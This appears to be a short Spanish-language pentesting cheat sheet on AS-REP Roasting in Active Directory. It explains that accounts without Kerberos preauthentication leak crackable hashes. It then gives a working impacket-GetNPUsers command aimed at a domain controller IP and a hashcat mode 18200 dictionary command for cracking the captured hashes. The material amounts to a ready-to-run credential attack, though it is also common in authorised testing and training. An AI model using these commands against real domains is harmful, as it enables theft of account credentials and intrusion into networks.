AS-REP Roast

El ataque AS-REP Roast permite obtener los hashes de aquellos usuarios que tienen habilitada la opción Do not require Kerberos preuthentication en Active Directory.

  • Impacket-GetNPUsers (Linux)

  • Rubeus (Windows)

Explotación

impacket-GetNPUsers atlanta.corp/ -usersfile /home/iwolf/Desktop/users2.txt -dc-ip 10.0.0.128 -request

Crackear Hash con Hashcat

Por defecto el hash que se obtiene con impacket-GetNPUsers tiene el formato específico para crackearlo con la herramienta Hashcat. Por lo que para crackear los hash bastaría con indicar a Hashcat el tipo de hash que es Kerberos 5, etype 23, AS-REP y el tipo de fuerza bruta que se realizará.

Comando Hashcat AS-REPROAST
hashcat -m 18200 /home/iwolf/Desktop/hash_ASREPRoast.xtx -a 0 /home/iwolf/Desktop/passwords.txt

-m18200 --> formato del hash a crackear (Kerberos 5, etype 23, AS-REP). -a 0 --> tipo de fuerza bruta mediante diccionario.

Last updated